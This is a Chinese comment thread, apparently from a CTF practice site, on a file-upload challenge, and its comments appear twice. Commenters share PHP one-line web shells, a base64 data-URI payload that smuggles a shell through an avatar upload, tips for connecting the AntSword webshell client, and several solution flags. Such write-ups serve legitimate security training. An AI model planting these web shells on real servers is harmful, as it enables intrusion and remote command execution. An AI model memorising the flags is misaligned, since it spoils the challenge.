蚁剑一直返回数据为空 一直连不上
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
<?php echo `$_POST[a]`;?>
<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=
base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。
我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。
flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base
这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}
flag{412d5e0844a33f36c9aa3d688425fb9f}
...
评论
zhuohao 19天前
举报
蚁剑一直返回数据为空 一直连不上
LLTVLL 1月前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 7月前
举报
<?php echo `$_POST[a]`;?>
Daniel2023 8月前
举报
<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=
vchopin 11月前
举报
base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上
XRain 1年前
举报
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。
不会编程的崽 1年前
举报
我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。
三碗不过杠 1年前
举报
flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base
冯飞99 1年前
举报
这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}
wxy1343 1年前
举报
flag{412d5e0844a33f36c9aa3d688425fb9f}